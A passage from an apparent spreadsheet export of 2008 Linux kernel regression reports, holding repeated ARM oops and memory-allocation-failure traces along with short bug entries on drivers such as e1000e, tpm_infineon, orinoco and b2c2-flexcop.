[&lt;c01bc420&gt;] (rxq_refill+0x0/0x1c0) from [&lt;c01bce0c&gt;] (rxq_refill_timer_wrapper+0x10/0x14) [&lt;c01bcdfc&gt;] (rxq_refill_timer_wrapper+0x0/0x14) from [&lt;c004d4f4&gt;] (run_timer_softirq+0x1cc/0x278) [&lt;c004d328&gt;] (run_timer_softirq+0x0/0x278) from [&lt;c00481a8&gt;] (__do_softirq+0x74/0xe8) [&lt;c0048134&gt;] (__do_softirq+0x0/0xe8) from [&lt;c00482dc&gt;] (do_softirq+0x58/0x64) [&lt;c0048284&gt;] (do_softirq+0x0/0x64) from [&lt;c0048358&gt;] (ksoftirqd+0x70/0x150) r4:00000000 [&lt;c00482e8&gt;] (ksoftirqd+0x0/0x150) from [&lt;c0059370&gt;] (kthread+0x58/0x8c) r8:00000000 r7:c0409774 r6:c00482e8 r5:00000000 r4:c7820000 [&lt;c0059318&gt;] (kthread+0x0/0x8c) from [&lt;c0045e80&gt;] (do_exit+0x0/0x88c) r7:00000000 r6:00000000 r5:00000000 r4:00000000 Mem-info: DMA per-cpu: CPU 0: hi: 42, btch: 7 usd: 6 Active:2470 inactive:1581 dirty:6 writeback:0 unstable:0 free:130 slab:26474 mapped:712 pagetables:56 bounce:0 DMA free:520kB min:1440kB low:1800kB high:2160kB active:9880kB inactive:6324kB present:130048kB pages_scanned:0 all_unreclaimable? no lowmem_reserve[]: 0 0 0 DMA: 2*4kB 0*8kB 2*16kB 3*32kB 2*64kB 2*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 520kB 3417 total pagecache pages 0 pages in swap cache Swap cache stats: add 0, delete 0, find 0/0 Free swap = 1662716kB Total swap = 1662716kB 32768 pages of RAM 231 free pages 1383 reserved pages 26474 slab pages 3409 pages shared 0 pages swap cached ksoftirqd/0: page allocation failure. order:0, mode:0x20 [&lt;c030a3e0&gt;] (dump_stack+0x0/0x14) from [&lt;c00797b4&gt;] (__alloc_pages_internal+0x358/0x438) [&lt;c007945c&gt;] (__alloc_pages_internal+0x0/0x438) from [&lt;c0098444&gt;] (cache_alloc_refill+0x370/0x6b8) [&lt;c00980d4&gt;] (cache_alloc_refill+0x0/0x6b8) from [&lt;c009885c&gt;] (__kmalloc+0xd0/0xdc) [&lt;c009878c&gt;] (__kmalloc+0x0/0xdc) from [&lt;c0289af8&gt;] (__alloc_skb+0x54/0xf8) r7:c7807c20 r6:00000640 r5:00000020 r4:c6bc99c0 [&lt;c0289aa4&gt;] (__alloc_skb+0x0/0xf8) from [&lt;c028a644&gt;] (dev_alloc_skb+0x20/0x44) r8:c7820000 r7:c01bcdfc r6:c7821f30 r5:00000101 r4:c0408440 [&lt;c028a624&gt;] (dev_alloc_skb+0x0/0x44) from [&lt;c01bc548&gt;] (rxq_refill+0x128/0x1c0) [&lt;c01bc420&gt;] (rxq_refill+0x0/0x1c0) from [&lt;c01bce0c&gt;] (rxq_refill_timer_wrapper+0x10/0x14) [&lt;c01bcdfc&gt;] (rxq_refill_timer_wrapper+0x0/0x14) from [&lt;c004d4f4&gt;] (run_timer_softirq+0x1cc/0x278) [&lt;c004d328&gt;] (run_timer_softirq+0x0/0x278) from [&lt;c00481a8&gt;] (__do_softirq+0x74/0xe8) [&lt;c0048134&gt;] (__do_softirq+0x0/0xe8) from [&lt;c00482dc&gt;] (do_softirq+0x58/0x64) [&lt;c0048284&gt;] (do_softirq+0x0/0x64) from [&lt;c0048358&gt;] (ksoftirqd+0x70/0x150) r4:00000000 [&lt;c00482e8&gt;] (ksoftirqd+0x0/0x150) from [&lt;c0059370&gt;] (kthread+0x58/0x8c) r8:00000000 r7:c0409774 r6:c00482e8 r5:00000000 r4:c7820000 [&lt;c0059318&gt;] (kthread+0x0/0x8c) from [&lt;c0045e80&gt;] (do_exit+0x0/0x88c) r7:00000000 r6:00000000 r5:00000000 r4:00000000 Mem-info: DMA per-cpu: CPU 0: hi: 42, btch: 7 usd: 6 Active:2470 inactive:1581 dirty:6 writeback:0 unstable:0 free:130 slab:26474 mapped:712 pagetables:56 bounce:0 DMA free:520kB min:1440kB low:1800kB high:2160kB active:9880kB inactive:6324kB present:130048kB pages_scanned:0 all_unreclaimable? no lowmem_reserve[]: 0 0 0 DMA: 2*4kB 0*8kB 2*16kB 3*32kB 2*64kB 2*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 520kB 3417 total pagecache pages 0 pages in swap cache Swap cache stats: add 0, delete 0, find 0/0 Free swap = 1662716kB Total swap = 1662716kB 32768 pages of RAM 231 free pages 1383 reserved pages 26474 slab pages 3409 pages shared 0 pages swap cached ksoftirqd/0: page allocation failure. order:0, mode:0x20 [&lt;c030a3e0&gt;] (dump_stack+0x0/0x14) from [&lt;c00797b4&gt;] (__alloc_pages_internal+0x358/0x438) [&lt;c007945c&gt;] (__alloc_pages_internal+0x0/0x438) from [&lt;c0098444&gt;] (cache_alloc_refill+0x370/0x6b8) [&lt;c00980d4&gt;] (cache_alloc_refill+0x0/0x6b8) from [&lt;c009885c&gt;] (__kmalloc+0xd0/0xdc) [&lt;c009878c&gt;] (__kmalloc+0x0/0xdc) from [&lt;c0289af8&gt;] (__alloc_skb+0x54/0xf8) r7:c7807c20 r6:00000640 r5:00000020 r4:c6bc99c0 [&lt;c0289aa4&gt;] (__alloc_skb+0x0/0xf8) from [&lt;c028a644&gt;] (dev_alloc_skb+0x20/0x44) r8:c7820000 r7:c01bcdfc r6:c7821f30 r5:00000101 r4:c0408440 [&lt;c028a624&gt;] (dev_alloc_skb+0x0/0x44) from [&lt;c01bc548&gt;] (rxq_refill+0x128/0x1c0) [&lt;c01bc420&gt;] (rxq_refill+0x0/0x1c0) from [&lt;c01bce0c&gt;] (rxq_refill_timer_wrapper+0x10/0x14) [&lt;c01bcdfc&gt;] (rxq_refill_timer_wrapper+0x0/0x14) from [&lt;c004d4f4&gt;] (run_timer_softirq+0x1cc/0x278) [&lt;c004d328&gt;] (run_timer_softirq+0x0/0x278) from [&lt;c00481a8&gt;] (__do_softirq+0x74/0xe8) [&lt;c0048134&gt;] (__do_softirq+0x0/0xe8) from [&lt;c00482dc&gt;] (do_softirq+0x58/0x64) [&lt;c0048284&gt;] (do_softirq+0x0/0x64) from [&lt;c0048358&gt;] (ksoftirqd+0x70/0x150) r4:00000000 [&lt;c00482e8&gt;] (ksoftirqd+0x0/0x150) from [&lt;c0059370&gt;] (kthread+0x58/0x8c) r8:00000000 r7:c0409774 r6:c00482e8 r5:00000000 r4:c7820000 [&lt;c0059318&gt;] (kthread+0x0/0x8c) from [&lt;c0045e80&gt;] (do_exit+0x0/0x88c) r7:00000000 r6:00000000 r5:00000000 r4:00000000 Mem-info: DMA per-cpu: CPU 0: hi: 42, btch: 7 usd: 6 Active:2470 inactive:1581 dirty:6 writeback:0 unstable:0 free:130 slab:26474 mapped:712 pagetables:56 bounce:0 DMA free:520kB min:1440kB low:1800kB high:2160kB active:9880kB inactive:6324kB present:130048kB pages_scanned:0 all_unreclaimable? no lowmem_reserve[]: 0 0 0 DMA: 2*4kB 0*8kB 2*16kB 3*32kB 2*64kB 2*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 520kB 3417 total pagecache pages 0 pages in swap cache Swap cache stats: add 0, delete 0, find 0/0 Free swap = 1662716kB Total swap = 1662716kB 32768 pages of RAM 231 free pages 1383 reserved pages 26474 slab pages 3409 pages shared 0 pages swap cached ksoftirqd/0: page allocation failure. order:0, mode:0x20 [&lt;c030a3e0&gt;] (dump_stack+0x0/0x14) from [&lt;c00797b4&gt;] (__alloc_pages_internal+0x358/0x438) [&lt;c007945c&gt;] (__alloc_pages_internal+0x0/0x438) from [&lt;c0098444&gt;] (cache_alloc_refill+0x370/0x6b8) [&lt;c00980d4&gt;] (cache_alloc_refill+0x0/0x6b8) from [&lt;c009885c&gt;] (__kmalloc+0xd0/0xdc) [&lt;c009878c&gt;] (__kmalloc+0x0/0xdc) from [&lt;c0289af8&gt;] (__alloc_skb+0x54/0xf8) r7:c7807c20 r6:00000640 r5:00000020 r4:c6bc99c0 [&lt;c0289aa4&gt;] (__alloc_skb+0x0/0xf8) from [&lt;c028a644&gt;] (dev_alloc_skb+0x20/0x44) r8:c7820000 r7:c01bcdfc r6:c7821f30 r5:00000101 r4:c0408440 [&lt;c028a624&gt;] (dev_alloc_skb+0x0/0x44) from [&lt;c01bc548&gt;] (rxq_refill+0x128/0x1c0) [&lt;c01bc420&gt;] (rxq_refill+0x0/0x1c0) from [&lt;c01bce0c&gt;] (rxq_refill_timer_wrapper+0x10/0x14) [&lt;c01bcdfc&gt;] (rxq_refill_timer_wrapper+0x0/0x14) from [&lt;c004d4f4&gt;] (run_timer_softirq+0x1cc/0x278) [&lt;c004d328&gt;] (run_timer_softirq+0x0/0x278) from [&lt;c00481a8&gt;] (__do_softirq+0x74/0xe8) [&lt;c0048134&gt;] (__do_softirq+0x0/0xe8) from [&lt;c00482dc&gt;] (do_softirq+0x58/0x64) [&lt;c0048284&gt;] (do_softirq+0x0/0x64) from [&lt;c0048358&gt;] (ksoftirqd+0x70/0x150) r4:00000000 [&lt;c00482e8&gt;] (ksoftirqd+0x0/0x150) from [&lt;c0059370&gt;] (kthread+0x58/0x8c) r8:00000000 r7:c0409774 r6:c00482e8 r5:00000000 r4:c7820000 [&lt;c0059318&gt;] (kthread+0x0/0x8c) from [&lt;c0045e80&gt;] (do_exit+0x0/0x88c) r7:00000000 r6:00000000 r5:00000000 r4:00000000 Mem-info: DMA per-cpu: CPU 0: hi: 42, btch: 7 usd: 6 Active:2470 inactive:1581 dirty:6 writeback:0 unstable:0 free:130 slab:26474 mapped:712 pagetables:56 bounce:0 DMA free:520kB min:1440kB low:1800kB high:2160kB active:9880kB inactive:6324kB present:130048kB pages_scanned:0 all_unreclaimable? no lowmem_reserve[]: 0 0 0 DMA: 2*4kB 0*8kB 2*16kB 3*32kB 2*64kB 2*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 520kB 3417 total pagecache pages 0 pages in swap cache Swap cache stats: add 0, delete 0, find 0/0 Free swap = 1662716kB Total swap = 1662716kB 32768 pages of RAM 231 free pages 1383 reserved pages 26474 slab pages 3409 pages shared 0 pages swap cached ksoftirqd/0: page allocation failure. order:0, mode:0x20 [&lt;c030a3e0&gt;] (dump_stack+0x0/0x14) from [&lt;c00797b4&gt;] (__alloc_pages_internal+0x358/0x438) [&lt;c007945c&gt;] (__alloc_pages_internal+0x0/0x438) from [&lt;c0098444&gt;] (cache_alloc_refill+0x370/0x6b8) [&lt;c00980d4&gt;] (cache_alloc_refill+0x0/0x6b8) from [&lt;c009885c&gt;] (__kmalloc+0xd0/0xdc) [&lt;c009878c&gt;] (__kmalloc+0x0/0xdc) from [&lt;c0289af8&gt;] (__alloc_skb+0x54/0xf8) r7:c7807c20 r6:00000640 r5:00000020 r4:c6bc99c0 [&lt;c0289aa4&gt;] (__alloc_skb+0x0/0xf8) from [&lt;c028a644&gt;] (dev_alloc_skb+0x20/0x44) r8:c7820000 r7:c01bcdfc r6:c7821f30 r5:00000101 r4:c0408440 [&lt;c028a624&gt;] (dev_alloc_skb+0x0/0x44) from [&lt;c01bc548&gt;] (rxq_refill+0x128/0x1c0) [&lt;c01bc420&gt;] (rxq_refill+0x0/0x1c0) from [&lt;c01bce0c&gt;] (rxq_refill_timer_wrapper+0x10/0x14) [&lt;c01bcdfc&gt;] (rxq_refill_timer_wrapper+0x0/0x14) from [&lt;c004d4f4&gt;] (run_timer_softirq+0x1cc/0x278) [&lt;c004d328&gt;] (run_timer_softirq+0x0/0x278) from [&lt;c00481a8&gt;] (__do_softirq+0x74/0xe8) [&lt;c0048134&gt;] (__do_softirq+0x0/0xe8) from [&lt;c00482dc&gt;] (do_softirq+0x58/0x64) [&lt;c0048284&gt;] (do_softirq+0x0/0x64) from [&lt;c0048358&gt;] (ksoftirqd+0x70/0x150) r4:00000000 [&lt;c00482e8&gt;] (ksoftirqd+0x0/0x150) from [&lt;c0059370&gt;] (kthread+0x58/0x8c) r8:00000000 r7:c0409774 r6:c00482e8 r5:00000000 r4:c7820000 [&lt;c0059318&gt;] (kthread+0x0/0x8c) from [&lt;c0045e80&gt;] (do_exit+0x0/0x88c) r7:00000000 r6:00000000 r5:00000000 r4:00000000 Mem-info: DMA per-cpu: CPU 0: hi: 42, btch: 7 usd: 6 Active:2470 inactive:1581 dirty:6 writeback:0 unstable:0 free:130 slab:26474 mapped:712 pagetables:56 bounce:0 DMA free:520kB min:1440kB low:1800kB high:2160kB active:9880kB inactive:6324kB present:130048kB pages_scanned:0 all_unreclaimable? no lowmem_reserve[]: 0 0 0 DMA: 2*4kB 0*8kB 2*16kB 3*32kB 2*64kB 2*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 520kB 3417 total pagecache pages 0 pages in swap cache Swap cache stats: add 0, delete 0, find 0/0 Free swap = 1662716kB Total swap = 1662716kB 32768 pages of RAM 231 free pages 1383 reserved pages 26474 slab pages 3409 pages shared 0 pages swap cached ksoftirqd/0: page allocation failure. order:0, mode:0x20 [&lt;c030a3e0&gt;] (dump_stack+0x0/0x14) from [&lt;c00797b4&gt;] (__alloc_pages_internal+0x358/0x438) [&lt;c007945c&gt;] (__alloc_pages_internal+0x0/0x438) from [&lt;c0098444&gt;] (cache_alloc_refill+0x370/0x6b8) [&lt;c00980d4&gt;] (cache_alloc_refill+0x0/0x6b8) from [&lt;c009885c&gt;] (__kmalloc+0xd0/0xdc) [&lt;c009878c&gt;] (__kmalloc+0x0/0xdc) from [&lt;c0289af8&gt;] (__alloc_skb+0x54/0xf8) r7:c7807c20 r6:00000640 r5:00000020 r4:c6bc99c0 [&lt;c0289aa4&gt;] (__alloc_skb+0x0/0xf8) from [&lt;c028a644&gt;] (dev_alloc_skb+0x20/0x44) r8:c7820000 r7:c01bcdfc r6:c7821f30 r5:00000101 r4:c0408440 [&lt;c028a624&gt;] (dev_alloc_skb+0x0/0x44) from [&lt;c01bc548&gt;] (rxq_refill+0x128/0x1c0) [&lt;c01bc420&gt;] (rxq_refill+0x0/0x1c0) from [&lt;c01bce0c&gt;] (rxq_refill_timer_wrapper+0x10/0x14) [&lt;c01bcdfc&gt;] (rxq_refill_timer_wrapper+0x0/0x14) from [&lt;c004d4f4&gt;] (run_timer_softirq+0x1cc/0x278) [&lt;c004d328&gt;] (run_timer_softirq+0x0/0x278) from [&lt;c00481a8&gt;] (__do_softirq+0x74/0xe8) [&lt;c0048134&gt;] (__do_softirq+0x0/0xe8) from [&lt;c00482dc&gt;] (do_softirq+0x58/0x64) [&lt;c0048284&gt;] (do_softirq+0x0/0x64) from [&lt;c0048358&gt;] (ksoftirqd+0x70/0x150) r4:00000000 [&lt;c00482e8&gt;] (ksoftirqd+0x0/0x150) from [&lt;c0059370&gt;] (kthread+0x58/0x8c) r8:00000000 r7:c0409774 r6:c00482e8 r5:00000000 r4:c7820000 [&lt;c0059318&gt;] (kthread+0x0/0x8c) from [&lt;c0045e80&gt;] (do_exit+0x0/0x88c) r7:00000000 r6:00000000 r5:00000000 r4:00000000 Mem-info: DMA per-cpu: CPU 0: hi: 42, btch: 7 usd: 6 Active:2470 inactive:1581 dirty:6 writeback:0 unstable:0 free:130 slab:26474 mapped:712 pagetables:56 bounce:0 DMA free:520kB min:1440kB low:1800kB high:2160kB active:9880kB inactive:6324kB present:130048kB pages_scanned:0 all_unreclaimable? no lowmem_reserve[]: 0 0 0 DMA: 2*4kB 0*8kB 2*16kB 3*32kB 2*64kB 2*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 520kB 3417 total pagecache pages 0 pages in swap cache Swap cache stats: add 0, delete 0, find 0/0 Free swap = 1662716kB Total swap = 1662716kB 32768 pages of RAM 231 free pages 1383 reserved pages 26474 slab pages 3409 pages shared 0 pages swap cached kernel BUG at include/linux/timer.h:165! Unable to handle kernel NULL pointer dereference at virtual address 00000000 pgd = c0004000 [00000000] *pgd=00000000 Internal error: Oops: 817 [#1] PREEMPT Modules linked in: CPU: 0 Not tainted (2.6.27-rc3-git6 #14) PC is at __bug+0x20/0x2c LR is at vprintk+0x314/0x3e8 pc : [&lt;c002dda4&gt;] lr : [&lt;c0043324&gt;] psr: 20000093 sp : c7821e90 ip : c7821df0 fp : c7821e9c r10: c78ce480 r9 : 000005f4 r8 : 00000000 r7 : 2fa42c56 r6 : c78ce000 r5 : c78ce480 r4 : 20000013 r3 : 00000000 r2 : c7820000 r1 : c7820000 r0 : 0000002c Flags: nzCv IRQs off FIQs on Mode SVC_32 ISA ARM Segment kernel Control: b005317f Table: 07380000 DAC: 00000017 Process ksoftirqd/0 (pid: 3, stack limit = 0xc7820268) Stack: (0xc7821e90 to 0xc7822000) 1e80: c7821ed4 c7821ea0 c01bc5d8 c002dd94 1ea0: c78ce380 60000013 c7821ed4 20000013 c78ce480 c78ce000 2fa42c56 c7780860 1ec0: ffc4b0a0 00000040 c7821f2c c7821ed8 c01bd754 c01bc430 c78ce380 00000040 1ee0: c78ce45c 00000040 c78ce380 00000000 c7820000 c78ce380 c78ce1dc 00000000 1f00: c7821f1c 00000040 c78ce45c 00000004 00000000 0000012c c041a7a0 c7820000 1f20: c7821f64 c7821f30 c028e05c c01bd490 c7821f30 ffffd4cd c7821f7c c04082a0 1f40: 00000001 00000004 c0408260 00000001 00000000 c040aa68 c7821f94 c7821f68 1f60: c00481a8 c028defc 00000000 60000013 c7820000 c0408260 00000000 00000001 1f80: 00000000 00000000 c7821fac c7821f98 c00482dc c0048144 00000000 00000000 1fa0: c7821fd4 c7821fb0 c0048358 c0048294 00000000 c7820000 00000000 c00482e8 1fc0: c0409774 00000000 c7821ff4 c7821fd8 c0059370 c00482f8 00000000 00000000 1fe0: 00000000 00000000 00000000 c7821ff8 c0045e80 c0059328 25da5a25 a55e49a5 Backtrace: [&lt;c002dd84&gt;] (__bug+0x0/0x2c) from [&lt;c01bc5d8&gt;] (rxq_refill+0x1b8/0x1c0) [&lt;c01bc420&gt;] (rxq_refill+0x0/0x1c0) from [&lt;c01bd754&gt;] (mv643xx_eth_poll+0x2d4/0x4d4) [&lt;c01bd480&gt;] (mv643xx_eth_poll+0x0/0x4d4) from [&lt;c028e05c&gt;] (net_rx_action+0x170/0x298) [&lt;c028deec&gt;] (net_rx_action+0x0/0x298) from [&lt;c00481a8&gt;] (__do_softirq+0x74/0xe8) [&lt;c0048134&gt;] (__do_softirq+0x0/0xe8) from [&lt;c00482dc&gt;] (do_softirq+0x58/0x64) [&lt;c0048284&gt;] (do_softirq+0x0/0x64) from [&lt;c0048358&gt;] (ksoftirqd+0x70/0x150) r4:00000000 [&lt;c00482e8&gt;] (ksoftirqd+0x0/0x150) from [&lt;c0059370&gt;] (kthread+0x58/0x8c) r8:00000000 r7:c0409774 r6:c00482e8 r5:00000000 r4:c7820000 [&lt;c0059318&gt;] (kthread+0x0/0x8c) from [&lt;c0045e80&gt;] (do_exit+0x0/0x88c) r7:00000000 r6:00000000 r5:00000000 r4:00000000 Code: e1a01000 e59f000c eb0b71e0 e3a03000 (e5833000) Kernel panic - not syncing: Fatal exception in interrupt</t>
  </si>
  <si>
    <t>char/tpm: tpm_infineon no longer loaded for HP 2510p laptop</t>
  </si>
  <si>
    <t>2008-08-20 05:45 UTC</t>
  </si>
  <si>
    <t>2008-08-24 14:08 UTC</t>
  </si>
  <si>
    <t>Subject : char/tpm: tpm_infineon no longer loaded for HP 2510p laptop Submitter : Frans Pop &lt;elendil@planet.nl&gt; Date : 2008-08-18 13:40 References : http://marc.info/?l=linux-kernel&amp;m=121906698213329&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>e1000e: 2.6.27-rc1 corrupts EEPROM/NVM</t>
  </si>
  <si>
    <t>2008-08-20 06:20 UTC</t>
  </si>
  <si>
    <t>2008-10-23 14:17 UTC</t>
  </si>
  <si>
    <t>Subject : e1000e: 2.6.27-rc1 corrupts EEPROM/NVM Submitter : David Vrabel &lt;david.vrabel@csr.com&gt; Date : 2008-08-08 10:47 References : http://marc.info/?l=linux-kernel&amp;m=121819267211679&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>tracehook breaks dhcpcd child processing</t>
  </si>
  <si>
    <t>2008-08-20 06:23 UTC</t>
  </si>
  <si>
    <t>2008-08-20 12:00 UTC</t>
  </si>
  <si>
    <t>Subject : tracehook breaks dhcpcd child processing Submitter : Andi Kleen &lt;andi@firstfloor.org&gt; Date : 2008-08-19 15:57 References : http://marc.info/?l=linux-kernel&amp;m=121916148910759&amp;w=4 Handled-By : Roland McGrath &lt;roland@redhat.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121920381717940&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>b2c2-flexcop adapter fails to register frontends due i2c readreg error</t>
  </si>
  <si>
    <t>2008-08-20 09:52 UTC</t>
  </si>
  <si>
    <t>Juha-Matti Heikkala</t>
  </si>
  <si>
    <t>2012-05-22 13:33 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25.11 Earliest failing kernel version: 2.6.26 Distribution: Archlinux Hardware Environment: Asus M2N-VM HDMI motherboard, Technisat Cablestar 2 PCI DVB-C card Software Environment: Problem Description: With 2.6.26 And later kernels frontend registeration of the Cablestar card doesn't work. For stv0297 DVB-C frontend dmesg says: b2c2-flexcop: i2c master_xfer failed stv0297_readreg: readreg error (reg == 0x80, ret == -121) b2c2-flexcop: no frontend driver found for this B2C2/FlexCop adapter So card is found and modules loaded but frontend registering fails so dvb-c usage is impossible. Steps to reproduce: Use 2.6.26 kernel or later</t>
  </si>
  <si>
    <t>orinoco pcmcia card does not initialise</t>
  </si>
  <si>
    <t>2.6.26 and later</t>
  </si>
  <si>
    <t>2008-08-20 14:24 UTC</t>
  </si>
  <si>
    <t>2009-06-17 17:40 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 Earliest failing kernel version: 2.6.26 Distribution: Ubuntu (mainline kernel) Hardware Environment: AMD Elan (http://www.embeddedarm.com/products/board-detail.php?product=TS-5500) sean@tiger:~$ lspci 00:00.0 Host bridge: Advanced Micro Devices [AMD] ELanSC520 Microcontroller 00:0b.0 USB Controller: OPTi Inc. 82C861 (rev 10) 00:0c.0 CardBus bridge: Texas Instruments PCI1510 PC card Cardbus Controller 00:0d.0 Ethernet controller: Davicom Semiconductor, Inc. 21x4x DEC-Tulip compat) 01:00.0 Network controller: Intersil Corporation ISL3890 [Prism GT/Prism Duette) sean@tiger:~$ lspci -n 00:00.0 0600: 1022:3000 00:0b.0 0c03: 1045:c861 (rev 10) 00:0c.0 0607: 104c:ac56 00:0d.0 0200: 1282:9102 (rev 40) 01:00.0 0280: 1260:3890 (rev 01) Software Environment: 2.6.26 and latest git (2.6.27-rc3-00632-g1bbe44f) produce: pccard: PCMCIA card inserted into slot 0 cs: memory probe 0x0c0000-0x0fffff: excluding 0xc0000-0xfffff cs: memory probe 0x60000000-0x60ffffff: clean. cs: memory probe 0xa0000000-0xa0ffffff: clean. pcmcia: registering new device pcmcia0.0 pcmcia: request for exclusive IRQ could not be fulfilled. pcmcia: the driver needs updating to supported shared IRQ lines. eth1: failed to initialize firmware (err = -19) orinoco_cs: register_netdev() failed pcmcia: request for exclusive IRQ could not be fulfilled. pcmcia: the driver needs updating to supported shared IRQ lines. eth1: failed to initialize firmware (err = -19) orinoco_cs: register_netdev() failed pcmcia: request for exclusive IRQ could not be fulfilled. pcmcia: the driver needs updating to supported shared IRQ lines. eth1: failed to initialize firmware (err = -19) orinoco_cs: register_netdev() failed Problem Description: The interface does not come up. Steps to reproduce:</t>
  </si>
  <si>
    <t>2.6.27-rc3 warns about MTRR range; only 3 of 16gb of memory is usable</t>
  </si>
  <si>
    <t>2008-08-20 17:38 UTC</t>
  </si>
  <si>
    <t>2008-08-30 14:35 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.4.24.2 (possibly later) Earliest failing kernel version: 2.6.27-rc3-21328-ga7f5aaf (from netdev-2.6) Distribution: Gentoo Hardware Environment: 2x Intel X5482 Software Environment: Problem Description: [ 0.000000] WARNING: BIOS bug: CPU MTRRs don't cover all of memory, losing 13056MB of RAM. [ 0.000000] ------------[ cut here ]------------ [ 0.000000] WARNING: at arch/x86/kernel/cpu/mtrr/main.c:1561 mtrr_trim_uncached_memory+0x508/0x550() [ 0.000000] Modules linked in: [ 0.000000] Pid: 0, comm: swapper Not tainted 2.6.27-rc3-21328-ga7f5aaf #8 [ 0.000000] [ 0.000000] Call Trace: [ 0.000000] [&lt;ffffffff80234c3e&gt;] warn_on_slowpath+0x51/0x77 [ 0.000000] [&lt;ffffffff8023570a&gt;] printk+0x4e/0x56 [ 0.000000] [&lt;ffffffff803add02&gt;] sort+0xfa/0x18c [ 0.000000] [&lt;ffffffff808283d3&gt;] cmp_range+0x0/0x6 [ 0.000000] [&lt;ffffffff80828a47&gt;] mtrr_trim_uncached_memory+0x508/0x550 [ 0.000000] [&lt;ffffffff802178e1&gt;] post_set+0x20/0x3d [ 0.000000] [&lt;ffffffff80824f99&gt;] setup_arch+0x39d/0x6be [ 0.000000] [&lt;ffffffff8081e962&gt;] start_kernel+0x74/0x341 [ 0.000000] [&lt;ffffffff8081e394&gt;] x86_64_start_kernel+0xe3/0xe7 [ 0.000000] [ 0.000000] ---[ end trace 4eaa2a86a8e2da22 ]--- Steps to reproduce: This warning isn't present under 2.6.24.2 and the full range of physical memory is usable.</t>
  </si>
  <si>
    <t>Kernel NULL pointer dereference in do_notify_parent()</t>
  </si>
  <si>
    <t>2.6.26.3</t>
  </si>
  <si>
    <t>2008-08-21 05:58 UTC</t>
  </si>
  <si>
    <t>Robert Rex</t>
  </si>
  <si>
    <t>2008-09-02 23:39 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26.3 Earliest failing kernel version: 2.6.25.4 (didn't test with former kernels) Distribution: CentOS 5.1 (with Vanilla kernel from kernel.org) Hardware Environment: several x86_64 plattforms (AMD Opteron, Intel Xeon) Problem Description: ------------------------------------- BUG: unable to handle kernel NULL pointer dereference at virtual address 0000000000000020 IP: [&lt;ffffffff8023d5d0&gt;] do_notify_parent+0x66/0x194 PGD 0 Oops: 0000 [1] SMP CPU 1 Modules linked in: ipv6 autofs4 hidp rfcomm l2cap bluetooth sunrpc dm_mirror dm_ log dm_multipath dm_mod video output sbs sbshc battery acpi_memhotplug ac lp sg floppy button tg3 serio_raw parport_pc parport k8temp hwmon i2c_amd756 i2c_amd81 11 i2c_core amd_rng shpchp pcspkr usb_storage 3w_9xxx sata_sil libata sd_mod scs i_mod raid456 async_xor async_memcpy async_tx xor ext3 jbd ehci_hcd ohci_hcd uhc i_hcd Pid: 3800, comm: sshd Not tainted 2.6.26.3 #1 RIP: 0010 [&lt;ffffffff8023d5d0&gt;] [&lt;ffffffff8023d5d0&gt;] do_notify_parent+0x66/0x194 RSP: 0018:ffff8101fd943c78 EFLAGS: 00010046 RAX: 0000000000000000 RBX: ffff8101fe08f2f0 RCX: ffff8101fd956870 RDX: ffff8101fe08f4c0 RSI: 0000000000000011 RDI: ffff8101fe08f2f0 RBP: 0000000000000000 R08: 0000000000000009 R09: 0000000000000009 R10: 0000000000000002 R11: ffffffff802f1c0e R12: 0000000000000011 R13: ffff8101fe4e00c0 R14: 0000000000000000 R15: 0000000000000001 FS: 00007fce4b4b2710(0000) GS:ffff8101ff08c8c0(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 0000000000000020 CR3: 0000000000201000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process sshd (pid: 3800, threadinfo ffff8101fd942000, task ffff8101fe4e00d0) Stack: 0000000000000011 ffff8101fec76630 ffff8101fe0e1180 ffffffff8029d597 0000000000000008 ffff8101fe0e1180 ffff8101fe7e87c0 ffffffff802a1915 ffff8101fd856c40 ffff8101fe0e1180 ffff8101fd856c40 0000000000000000 Call Trace: [&lt;ffffffff8029d597&gt;] dput+0x26/0xe7 [&lt;ffffffff802a1915&gt;] mntput_no_expire+0x20/0x119 [&lt;ffffffff8028b557&gt;] filp_close+0x5d/0x65 [&lt;ffffffff80233cd1&gt;] reparent_thread+0x139/0x14d [&lt;ffffffff802350ba&gt;] do_exit+0x39a/0x68c [&lt;ffffffff80235412&gt;] do_group_exit+0x66/0x96 [&lt;ffffffff8023d4f7&gt;] get_signal_to_deliver+0x2ea/0x305 [&lt;ffffffff8020b166&gt;] do_notify_resume+0xaf/0x7de [&lt;ffffffff802435de&gt;] autoremove_wake_function+0x0/0x2e [&lt;ffffffff80236198&gt;] current_fd_time+0x1e/0x24 [&lt;ffffffff8036dfdb&gt;] tty_ldisc_deref+0x62/0x75 [&lt;ffffffff8025bdfe&gt;] autit_syscall_exit+0x2e4/0x303 [&lt;ffffffff8020bf8c&gt;] int_signal+x012/0x17 Code: 00 48 39 87 30 02 00 00 74 04 0f 0b eb fe 44 89 24 24 c7 44 24 04 00 00 00 00 48 8b 83 b8 01 00 00 48 89 df 48 8b 80 98 04 00 00 &lt;48&gt; 8b 70 20 e8 57 39 00 00 48 8b 93 a0 04 00 00 89 44 24 10 8b RIP [&lt;ffffffff8023d5c9&gt;] do_notify_parent+0x66/0x194 RSP &lt;ffff8101f7535c78&gt; CR2: 0000000000000020 ---[ end trace 8df15d3ad47033c0 